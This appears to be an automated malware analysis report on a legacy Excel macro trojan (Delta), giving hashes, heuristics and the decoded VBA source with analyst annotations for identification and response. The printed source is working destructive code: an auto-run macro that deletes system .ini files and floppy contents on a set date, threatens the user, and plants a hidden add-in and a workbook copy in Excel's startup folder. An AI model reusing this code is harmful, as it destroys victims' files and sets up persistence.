Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f7cf81284c91583…

MALICIOUS

Office (OLE)

28.0 KB Created: 1998-06-01 23:45:29 First seen: 2012-06-14
MD5: 4c20924b6a9361ce40418a7462e2e3f5 SHA-1: 9d4489f7b880c1bb3f8a5445fbdc95487f053b18 SHA-256: 1f7cf81284c9158374ed42f6c00a5b461ec56a9da9498b0c60deb11562945fb1
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

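The file contains VBA macros, including an Auto_Open subroutine, a common technique for executing malicious code when a document is opened. The critical heuristic is a ClamAV detection of 'Xls.Trojan.Delta-6', indicating a known trojan. The Auto_Close macro resets the file attributes of an add-in in the Excel startup folder (c:\msoffice\excel\xlstart\EXCELVBA.XLA), potentially for persistence or cleanup. The extracted source also shows the macro writing an add-in and a copy of the workbook into that startup folder, and a date-triggered routine (Dstr) that deletes c:\windows\*.ini and a:\*.* on the 5th day of any month except January, so the impact includes file destruction as well as code execution. The presence of Auto_Open and Auto_Close macros, together with the ClamAV signature, strongly indicates malicious intent to execute arbitrary code.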

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6665 bytes
SHA-256: c1786b93bca1d7dca8d11053eb364e495056a02f43fbd2358722b6660af95d94
Detection
ClamAV: Xls.Trojan.Delta-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"

' Analyst note: Auto_Open is the auto-exec entry point; Excel runs it when the
' workbook is opened. It hides the status bar, runs the routines below in a
' fixed order, then shows the status bar again.
' Hlt, Hdn, Icn_1 and Icn_3 are not in the visible part of the extracted
' script, so their behaviour is unknown from this listing.
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
' Any runtime error jumps straight to the end of the sub with no message;
' in that case the status bar is not re-enabled.
On Error GoTo cuek
    Application.DisplayStatusBar = False
    ' Chk1 / Chk2: check for (and if needed create) the files in XLSTART.
    Call Chk1
    Call Chk2
    ' Dstr: date-triggered file deletion (see Dstr).
    Call Dstr
    Call Hlt
    Call Hdn
    ' Tim: schedules " Hlt " to run again 15 minutes later.
    Call Tim
    Call Icn_1
    Call Icn_3
    Application.DisplayStatusBar = True
cuek:
End Sub

' Analyst note: Auto_Close runs when the workbook is closed. It sets the
' attributes of the XLSTART add-in back to vbNormal, which undoes the vbHidden
' attribute that Thc1 applies to the same file. The reason is not shown in the
' code (presumably so the file can be rewritten later; unconfirmed).
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Errors (for example, the file does not exist) are silently ignored.
    On Error GoTo vodo
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbNormal
vodo:
End Sub


' Analyst note: schedules the procedure named " Hlt " (spaces are part of the
' string) to run 15 minutes from now through Application.OnTime.
' Hlt is not in the visible part of the script, so what it does is unknown here.
Sub Tim()
Attribute Tim.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnTime Now + TimeValue("00:15:00"), " Hlt "
End Sub

' Analyst note: taunt/"password" prompt, called from Dstr after the file
' deletions. Any answer other than "Delta" shows a message box and quits Excel.
' The prompt text and the " Delta Project " title are user-visible strings that
' can help victims or responders identify this family.
Sub Ky()
Attribute Ky.VB_ProcData.VB_Invoke_Func = " \n14"
    My_password = InputBox("This Is The Example Of My Project ! You Can Modified, Added in Order to be a God Hacker ! Please Type My Project Name to Continued or I'll Destroy Your Computer ! < By Bui'95 >", " Delta Project ")
    If My_password <> "Delta" Then
       MsgBox (" Sorry ..!, My Project Name is Delta ")
       Application.Quit
    Else
       ' Correct answer: show the "Module1" dialog sheet, then select and hide
       ' the "Dialog1" sheet. The error handler is only installed on this branch.
       On Error GoTo abis
       DialogSheets("Module1").Show
       Sheets("Dialog1").Select
       Sheets("Dialog1").Visible = False
    Exit Sub
    End If
abis:
End Sub

' Analyst note: effectively a no-op. The unconditional "GoTo low" on the first
' statement jumps past the whole body, so the lines between it and the label
' never execute. Waw is not in the visible part of the script.
Sub Ghst()
Attribute Ghst.VB_ProcData.VB_Invoke_Func = " \n14"
GoTo low
     ' Unreachable code below (skipped by the GoTo above).
     Set myobject = ActiveWorkbook
     If myobject.Application.Name = "BOOK1.XLS" Then
        Call Waw
     Else
        MsgBox " Wrong !", vbExclamation
     End If
low:
End Sub

' Analyst note: registers "Waw" as the OnWindow handler of the active window,
' i.e. the procedure Excel runs when that window is activated.
' Waw is not in the visible part of the script, so its effect is unknown here.
Sub Trl()
Attribute Trl.VB_ProcData.VB_Invoke_Func = " \n14"
Set objectku = ActiveWindow
    objectku.OnWindow = "Waw"
End Sub

' Analyst note: destructive, date-triggered routine (called from Auto_Open).
' On the 5th day of any month from February to December it deletes every .ini
' file in c:\windows and every file in the root of drive a:, then calls Ky.
' For response: unexplained loss of c:\windows\*.ini on such a date is
' consistent with this routine having run.
Sub Dstr()
Attribute Dstr.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Any runtime error (e.g. no disk in a:) jumps to the end silently and
    ' skips the remaining statements, including the call to Ky.
    On Error GoTo bail
    ' tgl is assigned but not used anywhere in this sub.
    tgl = 13
    MyDate = Date
    If Day(MyDate) = 5 And Month(MyDate) > 1 Then
       Kill "c:\windows\*.ini"
       Kill "a:\*.*"
       Call Ky
    End If
bail:
End Sub


' Analyst note: persistence routine. Builds an add-in named EXCELVBA.XLA in
' the Excel startup folder (files in XLSTART are loaded when Excel starts) via
' the Excel 4 macro function VBA.MAKE.ADDIN, then marks the file hidden.
' txt and prt are not in the visible part of the script.
' Indicator from this listing: c:\msoffice\excel\xlstart\EXCELVBA.XLA with the
' hidden attribute set.
Sub Thc1()
Attribute Thc1.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Any failure aborts the routine silently.
    On Error GoTo bae
    ChDrive "c:\"
    ChDir "c:\msoffice\excel\xlstart"
'    Application.DisplayStatusBar = False
    ' The macro sheet is made visible only while the add-in is created and is
    ' hidden again afterwards.
    Sheets("Module1").Visible = True
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""c:\msoffice\excel\xlstart\EXCELVBA.XLA"")"
    Sheets("Module1").Select
    Call txt
    Sheets("Module1").Select
    Call prt
    Sheets("Module1").Visible = False
'   Sheets("Sheet1").Select
'   Application.DisplayStatusBar = True
    ' Hide the dropped add-in from normal directory listings.
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbHidden
bae:
End Sub

' Analyst note: presence/size check for the XLSTART add-in. If excelvba.xla is
' missing (FileLen raises an error) or smaller than 22000 bytes, Thc1 is called
' to (re)create it; otherwise nothing is done.
' Because the If branch falls through into the "kajeun" label, a file smaller
' than 22000 bytes results in Thc1 being called twice.
Sub Chk1()
Attribute Chk1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo kajeun
    mysize = FileLen("c:\msoffice\excel\xlstart\excelvba.xla")    ' Returns file length (bytes).
    If mysize < 22000 Then
       Call Thc1
    Else
        ' File exists and is large enough: skip the re-creation step.
        GoTo diam
    End If
kajeun:
    ' Reached on error (file not found) and by fall-through from the If branch.
    Call Thc1
diam:
End Sub


' Analyst note: same pattern as Chk1, applied to book1.xls in XLSTART. If the
' file is missing (FileLen raises an error) or smaller than 22000 bytes, Thc2
' is called to save the current workbook there; otherwise nothing is done.
' The If branch falls through into the "baeah" label, so a file smaller than
' 22000 bytes results in Thc2 being called twice.
Sub Chk2()
Attribute Chk2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo baeah
    mybra = FileLen("c:\msoffice\excel\xlstart\book1.xls")     ' Returns file length (bytes).
    If mybra < 22000 Then
      Call Thc2
    Else
      ' File exists and is large enough: skip the save step.
      GoTo cuek
    End If
baeah:
    ' Reached on error (file not found) and by fall-through from the If branch.
    Call Thc2
cuek:
End Sub


' Analyst note: persistence/propagation step. Saves the active workbook
' (macros included) as BOOK1.XLS in the Excel startup folder, with no open or
' write password and no backup copy. Errors are ignored silently.
' Indicator from this listing: c:\msoffice\excel\xlstart\BOOK1.XLS.
Sub Thc2()
Attribute Thc2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo wow
    ActiveWorkbook.SaveAs FileName:="c:\msoffice\excel\xlstart\BOOK1.XLS", FileFormat:=xlNormal, _
    Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
    , CreateBackup:=False
wow:
End Sub

Sub ins()
Attribute ins.VB_ProcData.VB_Invoke_Func = " \n14"
     SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbNormal
     Set mytarget = ActiveSheet
     Set myobject = ActiveWorkbook
        On Error GoTo oke
        Sheets("Module1").Visible = True
        Call prt
        Sheets("Module1").Visible = False
'      If myobject.Name <> "BOOK1.XLS" And mytarget.Name <> "Module1" Then
        SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbHidden
         Call Hdn
         Call Waw
         Exit Sub
'      End If
oke:
        ActiveWorkbook.Modules().Add
        ActiveWorkbook.ActiveSheet().InsertFile 
... (truncated)